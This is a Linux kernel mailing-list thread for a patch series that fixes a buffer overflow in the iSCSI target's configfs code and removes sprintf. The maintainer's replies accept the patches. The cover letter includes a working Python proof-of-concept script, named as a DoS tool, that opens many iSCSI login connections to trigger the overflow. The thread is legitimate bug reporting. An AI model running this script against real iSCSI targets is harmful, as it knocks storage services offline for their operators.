mbox series

[0/2] scsi: target: iscsi: Get rid of sprintf in iscsi_target_configfs.c

Message ID 20230722152657.168859-1-k.shelekhin@yadro.com (mailing list archive)
Headers show
Series scsi: target: iscsi: Get rid of sprintf in iscsi_target_configfs.c | expand

Message

Konstantin Shelekhin July 22, 2023, 3:26 p.m. UTC
This patch series cleanses iscsi_target_configfs.c of sprintf usage. The
first patch fixes the real problem, the second just makes sure we are on
the safe side from now on.

I've reproduced the issue fixed in the first patch by utilizing this
cool thing:

  https://git.sr.ht/~kshelekhin/scapy-iscsi

Yeah, shameless promoting of my own tools, but I like the simplicity of
scapy and writing tests in C with libiscsi can be a little cumbersome.

Check it out:

  #!/usr/bin/env python3
  # Let's cause some DoS in iSCSI target

  import sys

  from scapy.supersocket import StreamSocket
  from scapy_iscsi.iscsi import *

  cpr = {
      "InitiatorName": "iqn.2016-04.com.open-iscsi:e476cd9e4e59",
      "TargetName": "iqn.2023-07.com.example:target",
      "HeaderDigest": "None",
      "DataDigest": "None",
  }

  spr = {
      "SessionType": "Normal",
      "ErrorRecoveryLevel": 0,
      "DefaultTime2Retain": 0,
      "DefaultTime2Wait": 2,
      "ImmediateData": "Yes",
      "FirstBurstLength": 65536,
      "MaxBurstLength": 262144,
      "MaxRecvDataSegmentLength": 262144,
      "MaxOutstandingR2T": 1,
  }

  if len(sys.argv) != 3:
      print("usage: dos.py <host> <port>", file=sys.stderr)
      exit(1)

  host = sys.argv[1]
  port = int(sys.argv[2])
  isid = 0xB00B
  tsih = 0
  connections = []

  for i in range(0, 127):
      s = socket.socket()
      s.connect((host, port))
      s = StreamSocket(s, ISCSI)

      ds = cpr if i > 0 else cpr | spr
      lirq = ISCSI() / LoginRequest(isid=isid, tsih=tsih, cid=i, ds=kv2text(ds))
      lirs = s.sr1(lirq)
      tsih = lirs.tsih

      connections.append(s)

  input()

Konstantin Shelekhin (2):
  scsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show
  scsi: target: iscsi: Stop using sprintf in iscsi_target_configfs.c

 drivers/target/iscsi/iscsi_target_configfs.c | 72 ++++++++++----------
 1 file changed, 36 insertions(+), 36 deletions(-)

Comments

Martin K. Petersen July 31, 2023, 4:13 p.m. UTC | #1
Konstantin,

> This patch series cleanses iscsi_target_configfs.c of sprintf usage.
> The first patch fixes the real problem, the second just makes sure we
> are on the safe side from now on.

Applied to 6.6/scsi-staging, thanks!
Martin K. Petersen Aug. 8, 2023, 2:50 a.m. UTC | #2
On Sat, 22 Jul 2023 18:26:36 +0300, Konstantin Shelekhin wrote:

> This patch series cleanses iscsi_target_configfs.c of sprintf usage. The
> first patch fixes the real problem, the second just makes sure we are on
> the safe side from now on.
> 
> I've reproduced the issue fixed in the first patch by utilizing this
> cool thing:
> 
> [...]

Applied to 6.6/scsi-queue, thanks!

[1/2] scsi: target: iscsi: Fix buffer overflow in lio_target_nacl_info_show
      https://git.kernel.org/mkp/scsi/c/801f287c93ff
[2/2] scsi: target: iscsi: Stop using sprintf in iscsi_target_configfs.c
      https://git.kernel.org/mkp/scsi/c/c0431feb0a75